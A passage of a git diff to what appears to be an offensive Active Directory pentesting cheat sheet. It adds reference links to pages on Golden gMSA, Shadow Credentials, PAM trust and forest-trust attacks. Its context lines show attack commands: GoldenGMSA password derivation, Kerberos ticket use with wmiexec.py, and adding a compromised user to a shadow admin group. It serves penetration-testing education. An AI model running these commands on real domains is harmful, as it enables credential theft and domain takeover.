10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) \ No newline at end of file diff --git a/docs/active-directory/pwd-read-gmsa.md b/docs/active-directory/pwd-read-gmsa.md index 0291ebc..abddf02 100644 --- a/docs/active-directory/pwd-read-gmsa.md +++ b/docs/active-directory/pwd-read-gmsa.md @@ -68,4 +68,11 @@ GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode - ``` \ No newline at end of file + ``` + + +## References + +* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) +* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/) +* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) \ No newline at end of file diff --git a/docs/active-directory/pwd-shadow-credentials.md b/docs/active-directory/pwd-shadow-credentials.md index 7d22736..511d264 100644 --- a/docs/active-directory/pwd-shadow-credentials.md +++ b/docs/active-directory/pwd-shadow-credentials.md @@ -62,4 +62,11 @@ # Utilize the ST for future activity export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab - ``` \ No newline at end of file + ``` + + +## References + +* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition) +* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) +* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab) \ No newline at end of file diff --git a/docs/active-directory/trust-pam.md b/docs/active-directory/trust-pam.md index 8ada2de..2928472 100644 --- a/docs/active-directory/trust-pam.md +++ b/docs/active-directory/trust-pam.md @@ -37,4 +37,8 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma ```ps1 # Add a compromised user to the group Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"} - ``` \ No newline at end of file + ``` + +## References + +* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) \ No newline at end of file diff --git a/docs/active-directory/trust-relationship.md b/docs/active-directory/trust-relationship.md index a0069a2..f41f460 100644 --- a/docs/active-directory/trust-relationship.md +++ b/docs/active-directory/trust-relationship.md @@ -39,4 +39,10 @@ | Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | | Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | | Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | -| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | \ No newline at end of file +| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | + + +## References + +* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html) +* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) \ No newline at end of file